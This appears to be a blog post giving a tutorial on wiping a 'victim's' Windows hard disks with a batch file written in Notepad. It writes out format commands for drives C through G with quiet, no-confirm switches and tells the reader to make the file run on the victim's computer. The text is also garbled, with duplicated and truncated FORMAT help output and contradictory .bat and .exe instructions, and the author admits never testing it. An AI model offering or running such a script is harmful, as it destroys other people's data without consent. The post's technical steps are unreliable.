How to format someone's entire hard disk using notepad:
Today we will learn formatting the entire hard disk using notepad. Yes, Notepad you heard it right.
Requirements:
A windows victim.
A notepad created .bat file from attacker machine.
Step 1:Click on start button and open notepad.
Step 2:Write following commands in notepad
format D:/q /y
format E:/q /y
format F:/q /y
format G:/q /y
format C:/q /y
// just to make sure other drives are formatted first.
Here’s some information on this command:
FORMAT volume [/FS:file-system] [/V:label] [/Q] [/A:size] [/C] [/X] [/P:passes]
FORMAT volume [/V:label] [/Q] [/F:size] [/P:passes]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors] [/P:passes]
FORMAT volume [/V:label] [/Q] [/P:passes]
FORMAT volume [/Q]
volume Specifies the drive letter (followed by a colon), mount point, or volume name.
FORMAT volume [/V:label] [/Q] [/F:size] [/P:passes]
FORMAT volume [/V:label] [/Q] [/T:tracks /N:sectors] [/P:passes]
FORMAT volume [/V:label] [/Q] [/P:passes]
FORMAT volume [/Q]
volume Specifies the drive letter (followed by a colon), mount point, or volume name.
/FS:filesystem Specifies the type of the file system (FAT, FAT32, NTFS, or UDF).
/V:label Specifies the volume label.
/Q Performs a quick format. Note that this switch overrides /P.
/C NTFS only: Files created on the new volume will be compressed by default.
/X Forces the volume to dismount first if necessary. All opened handles to the volume would no longer be valid.
/R:revision UDF only: Forces the format to a specific UDF version (1.02, 1.50, 2.00, 2.01, 2.50). The default revision is 2.01.
/D UDF 2.50 only: Metadata will be duplicated.
/A:size Overrides the default allocation unit size. Default settings are strongly recommended for general use.
NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
/D UDF 2.50 only: Metadata will be duplicated.
/A:size Overrides the default allocation unit size. Default settings are strongly recommended for general use.
NTFS supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K.
FAT supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K, (128K, 256K for sector size > 512 bytes).
FAT32 supports 512, 1024, 2048, 4096, 8192, 16K, 32K, 64K, (128K, 256K for sector size > 512 bytes).
Note that the FAT and FAT32 files systems impose the following restrictions on the number of clusters on a volume:
FAT: Number of clusters --
Note that the FAT and FAT32 files systems impose the following restrictions on the number of clusters on a volume:
FAT: Number of clusters --
Step 3:Save this file as .exe and make it run on victim’s computer.
And that’s all.
Note: I have not tried running this command. And you should not on your computer but you should try before use. Feel free to comment .........
No comments:
Write comments